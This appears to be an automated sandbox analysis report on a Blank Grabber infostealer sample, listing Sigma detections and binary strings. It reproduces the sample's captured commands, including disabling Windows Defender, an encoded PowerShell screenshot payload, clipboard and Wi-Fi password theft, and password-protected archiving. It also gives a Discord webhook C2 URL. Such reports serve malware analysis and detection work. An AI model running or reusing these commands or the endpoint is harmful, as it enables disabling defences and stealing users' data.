Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4mvljvuo\4mvljvuo.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4mvljvuo\4mvljvuo.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKA

Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\El9HaBFrFM.exe", ParentImage: C:\Users\user\Desktop\El9HaBFrFM.exe, ParentProcessId: 7532, ParentProcessName: El9HaBFrFM.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 3468, ProcessName: cmd.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: SCR File Write Event

Source: File created

Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\El9HaBFrFM.exe, ProcessId: 7532, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\El9HaBFrFM.exe, ProcessId: 7532, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

Sigma detected: Suspicious Execution of Powershell with Base64

Source: Process started

Sigma detected: Suspicious Screensaver Binary File Creation

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\El9HaBFrFM.exe, ProcessId: 7532, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8712, TargetFilename: C:\Users\user\AppData\Local\Temp\4mvljvuo\4mvljvuo.cmdline

Sigma detected: Files Added To An Archive Using Rar.EXE

Source: Process started

Author: Timur Zinniatullin, E.M. Anhaus, oscd.community: Data: Command: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe a -r -hp"dave123" "C:\Users\user\AppData\Local\Temp\BfsYI.zip" *, CommandLine: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe a -r -hp"dave123" "C:\Users\user\AppData\Local\Temp\BfsYI.zip" *, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe a -r -hp"dave123" "C:\Users\user\AppData\Local\Temp\BfsYI.zip" *", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 9144, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe a -r -hp"dave123" "C:\Users\user\AppData\Local\Temp\BfsYI.zip" *, ProcessId: 8992, ProcessName: rar.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7604, ParentProcessName: cmd.exe, ProcessCommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, ProcessId: 7692, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 8572, ProcessName: svchost.exe

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4mvljvuo\4mvljvuo.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4mvljvuo\4mvljvuo.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKA

Stealing of Sensitive Information

Sigma detected: Capture Wi-Fi password

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\El9HaBFrFM.exe", ParentImage: C:\Users\user\Desktop\El9HaBFrFM.exe, ParentProcessId: 7532, ParentProcessName: El9HaBFrFM.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 8380, ProcessName: cmd.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: El9HaBFrFM.exe.7532.1.memstrmin

Malware Configuration Extractor: Blank Grabber {"C2 url": "https://discord.com/api/webhooks/1301205706979938325/6QPgIPYq-Css-OJ6_lkSJ5Pdu0MNeXcvPrjnAZiyfOIJh3PJiYs412SWGodn3lagwGj7"}

Multi AV Scanner detection for submitted file

Source: El9HaBFrFM.exe

ReversingLabs: Detection: 52%

Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe

Code function: 83_2_00007FF6D7EE901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,

83_2_00007FF6D7EE901C

Source: https://trksyln.net/Error

HTTP Parser: Base64 decoded: [null,null,null,null,null,null,[1730398767,181000000],null,null,null,[null,[7]],"https://trksyln.net/Error",null,[[8,"YsgOOctukrI"],[9,"en-US"],[19,"2"],[17,"[0]"]]]

Source: https://trksyln.net/Error	HTTP Parser: No favicon
Source: https://trksyln.net/Error	HTTP Parser: No favicon
Source: https://trksyln.net/Error	HTTP Parser: No favicon
Source: https://trksyln.net/Error	HTTP Parser: No favicon
Source: https://trksyln.net/Error	HTTP Parser: No favicon
Source: https://trksyln.net/Error	HTTP Parser: No favicon
Source: https://trksyln.net/Error	HTTP Parser: No favicon
Source: https://trksyln.net/Error	HTTP Parser: No favicon

Source: unknown

HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:51254 version: TLS 1.2

Source: El9HaBFrFM.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: El9HaBFrFM.exe, 00000001.00000002.2254958100.00007FFDFA9D7000.00000040.00000001.01000000.00000013.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\4mvljvuo\4mvljvuo.pdbhP, source: powershell.exe, 0000002E.00000002.1947586190.0000026CB8305000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb\| source: El9HaBFrFM.exe, 00000001.00000002.2256002845.00007FFDFAFCA000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdbDD source: El9HaBFrFM.exe, 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL \|\| WITHIN_ARENA(temp->next)assertion failed: (char *)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) \|\| WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
Source:	Binary string: o.pdbE source: powershell.exe, 0000002E.00000002.2106834306.0000026CD013D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\4mvljvuo\4mvljvuo.pdb source: powershell.exe, 0000002E.00000002.1947586190.0000026CB8305000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: El9HaBFrFM.exe, 00000000.00000003.1683960250.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2261813551.00007FFE13344000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: El9HaBFrFM.exe, 00000001.00000002.2256002845.00007FFDFAF32000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: El9HaBFrFM.exe, 00000000.00000003.1683960250.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2261813551.00007FFE13344000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: El9HaBFrFM.exe, El9HaBFrFM.exe, 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb source: El9HaBFrFM.exe, El9HaBFrFM.exe, 00000001.00000002.2256002845.00007FFDFAFCA000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000053.00000002.2145961692.00007FF6D7F40000.00000002.00000001.01000000.00000022.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: El9HaBFrFM.exe, 00000001.00000002.2261083464.00007FFE13201000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: El9HaBFrFM.exe, 00000001.00000002.2261488219.00007FFE13301000.00000040.00000001.01000000.00000006.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: El9HaBFrFM.exe, El9HaBFrFM.exe, 00000001.00000002.2259608599.00007FFE11501000.00000040.00000001.01000000.00000011.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: El9HaBFrFM.exe
Source:	Binary string: E:\trksyln\Coding\trksyln.net\repos\TGMacro\obj\Debug\TGMacro.pdb source: El9HaBFrFM.exe, 00000001.00000003.1710912781.0000025069359000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1711527664.0000025069462000.00000004.00000020.00020000.00000000.sdmp, bound.exe, 00000012.00000000.1715370001.0000026C525E2000.00000002.00000001.01000000.00000016.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: El9HaBFrFM.exe, 00000001.00000002.2261272243.00007FFE1322B000.00000040.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: El9HaBFrFM.exe, 00000001.00000002.2260891660.00007FFE130C1000.00000040.00000001.01000000.00000012.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: El9HaBFrFM.exe, 00000001.00000002.2261272243.00007FFE1322B000.00000040.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: El9HaBFrFM.exe, 00000001.00000002.2260707482.00007FFE11ED1000.00000040.00000001.01000000.00000009.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: El9HaBFrFM.exe, 00000001.00000002.2260219620.00007FFE11561000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: El9HaBFrFM.exe, 00000001.00000002.2260486128.00007FFE11EA1000.00000040.00000001.01000000.0000000A.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python313.pdb source: El9HaBFrFM.exe, 00000001.00000002.2258031629.00007FFDFB648000.00000040.00000001.01000000.00000004.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdb source: El9HaBFrFM.exe, El9HaBFrFM.exe, 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: El9HaBFrFM.exe, El9HaBFrFM.exe, 00000001.00000002.2259888394.00007FFE1152E000.00000040.00000001.01000000.0000000E.sdmp

Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 0_2_00007FF6BA3A83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00007FF6BA3A83C0
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 0_2_00007FF6BA3A9280 FindFirstFileExW,FindClose,	0_2_00007FF6BA3A9280
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 0_2_00007FF6BA3C1874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00007FF6BA3C1874
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FF6BA3A9280 FindFirstFileExW,FindClose,	1_2_00007FF6BA3A9280
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FF6BA3A83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	1_2_00007FF6BA3A83C0
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: 1_2_00007FF6BA3C1874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	1_2_00007FF6BA3C1874
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7EF46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	83_2_00007FF6D7EF46EC
